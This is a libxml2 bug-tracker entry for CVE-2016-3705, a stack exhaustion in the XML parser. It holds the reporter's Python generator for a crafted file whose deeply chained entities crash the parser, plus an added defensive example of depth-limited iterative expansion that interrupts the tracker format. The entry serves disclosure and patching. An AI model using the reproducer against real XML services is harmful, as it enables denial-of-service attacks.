Bug 765207 - (CVE-2016-3705) Stack exhaustion parsing xml in parser
Status: RESOLVED FIXED
Product: libxml2
Classification: Platform
Component: general
Version: git master
Hardware/OS: Other Linux
Priority: Normal
Severity: critical
Target Milestone: ---
Assigned To: Daniel Veillard
QA Contact: libxml QA maintainers
Depends on:
Blocks: 765977
Reported: 2016-04-18 12:34 UTC by Simon Lees (SUSE)
Modified: 2016-05-22 01:29 UTC
CC: 5 users

See Also:
GNOME target: ---
GNOME version: ---


Attachments
Reproducer (769.36 KB, text/xml), 2016-05-03 14:03 UTC, Simon Lees (SUSE)
Patch fix (2.26 KB, patch), 2016-05-03 14:05 UTC, Simon Lees (SUSE)

Description Simon Lees (SUSE) 2016-04-18 12:34:28 UTC
It is possible to trigger a stack overflow using a carefully crafted invalid xml file, the stack overflow occurs before libxml2 determines the xml file is invalid. This was branched from https://bugzilla.gnome.org/show_bug.cgi?id=762100

Reproducer and fixes are available while this bug is private.
Comment 1 Simon Lees (SUSE) 2016-05-03 13:59:48 UTC
Generator for the reproducer is below:

#!/usr/bin/env python3
# Writes repo.xml: a DOCTYPE whose internal subset declares a chain of
# general entities, each one's replacement text referencing the next:
# a1 -> a2 -> ... -> a29999 -> a30000 (a30000 itself is not declared),
# plus a30001 referring back to a1. The root element's attribute value
# references a1, so expansion starts at the head of the chain.

N = 30000

with open('repo.xml', 'w') as f:
    f.write("<!DOCTYPE a [ ")

    for i in range(1, N):
        f.write('<!ENTITY a%d "&a%d;">' % (i, i + 1))

    f.write('<!ENTITY a%d "&a1;">]> <bruces bogans="&a1;">' % (N + 1))
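The description and the generator above show the shape of the attack: a chain of general entities, each one's replacement text referencing the next, long enough that a recursive expander runs out of native stack before any validity check rejects the document. The following Python is an added example, not the reporter's code and not libxml2's fix; it rebuilds the same chain and expands it with an explicit work list and a depth budget, so the chain is refused as too deep instead of being recursed into. The regexes are a deliberate simplification of DTD parsing, and the names (ENTITY_DECL, expand, check_document) and the bound MAX_ENTITY_DEPTH = 40 are chosen for this illustration only; they are not libxml2 identifiers or limits.

```python
import re

# Added example; names and the depth bound below are illustrative, not libxml2's.

# <!ENTITY name "value"> declarations, as emitted by the reporter's generator.
ENTITY_DECL = re.compile(r'<!ENTITY\s+(\w+)\s+"([^"]*)">')
# &name; references inside replacement text or attribute values.
ENTITY_REF = re.compile(r'&(\w+);')

# Illustrative bound on how many entity replacement texts may nest.
MAX_ENTITY_DEPTH = 40


def build_chain(n):
    """Rebuild the document the generator writes: a1 -> a2 -> ... -> a(n-1),
    each referencing the next, a(n+1) referencing a1, and a root element whose
    attribute value references a1."""
    parts = ["<!DOCTYPE a [ "]
    for i in range(1, n):
        parts.append('<!ENTITY a%d "&a%d;">' % (i, i + 1))
    parts.append('<!ENTITY a%d "&a1;">]> <bruces bogans="&a1;">' % (n + 1))
    return "".join(parts)


def parse_entities(doc):
    """Map entity name -> replacement text for every declaration in the document."""
    return dict(ENTITY_DECL.findall(doc))


def expand(name, entities, max_depth=MAX_ENTITY_DEPTH):
    """Expand one entity without recursion.

    A work list replaces the call stack, so a chain of any length costs heap
    rather than native stack, and a depth counter travels with each piece of
    replacement text so expansion is refused once more than max_depth entity
    values are nested. Returns (status, text): status is "ok", "too-deep" or
    "undefined"; text carries the expansion or the missing entity name.
    """
    if name not in entities:
        return ("undefined", name)
    out = []
    work = [(entities[name], 1)]          # (replacement text, nesting depth)
    while work:
        text, depth = work.pop()
        pieces = ENTITY_REF.split(text)   # [lit0, ref1, lit1, ref2, lit2, ...]
        if len(pieces) == 1:              # no references left: emit as-is
            out.append(text)
            continue
        if depth >= max_depth:            # would nest one value too many
            return ("too-deep", None)
        # Push right-to-left so the leftmost piece is processed first.
        for idx in range(len(pieces) - 1, -1, -1):
            piece = pieces[idx]
            if idx % 2 == 0:
                work.append((piece, depth))                # literal text
            elif piece in entities:
                work.append((entities[piece], depth + 1))  # nested entity value
            else:
                return ("undefined", piece)
    return ("ok", "".join(out))


def check_document(doc, max_depth=MAX_ENTITY_DEPTH):
    """Expand every entity referenced in the document body (after the internal
    subset) and report (name, status) for each, without ever recursing."""
    entities = parse_entities(doc)
    end = doc.find("]>")
    body = doc if end < 0 else doc[end + 2:]
    return [(ref, expand(ref, entities, max_depth)[0])
            for ref in ENTITY_REF.findall(body)]


if __name__ == "__main__":
    doc = build_chain(30000)              # same chain length the reporter used
    print(check_document(doc))            # [('a1', 'too-deep')]
```

With the bound in place the 30000-entity chain is rejected after 40 nested values; raising max_depth far enough to walk the whole chain reports the undeclared a30000 instead, and neither outcome touches the native stack, which is the property a parser needs regardless of where it sets the limit.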
Comment 2 Simon Lees (SUSE) 2016-05-03 14:03:48 UTC
Created attachment 327227 [details]
Reproducer
Comment 3 Simon Lees (SUSE) 2016-05-03 14:05:43 UTC
Created attachment 327229 [details] [review]
Patch fix
Comment 4 Simon Lees (SUSE) 2016-05-03 14:06:14 UTC
This bug will shortly be disclosed on the oss-security mailing list, you can make it public now.
Comment 5 Salvatore Bonaccorso 2016-05-04 13:54:28 UTC
FTR, this issue has been assigned CVE-2016-3705.
Comment 6 Daniel Veillard 2016-05-22 01:29:40 UTC
Fix committed at:

https://git.gnome.org/browse/libxml2/commit/?id=8f30bdff69edac9075f4663ce3b56b0c52d48ce6


  thanks,

Daniel
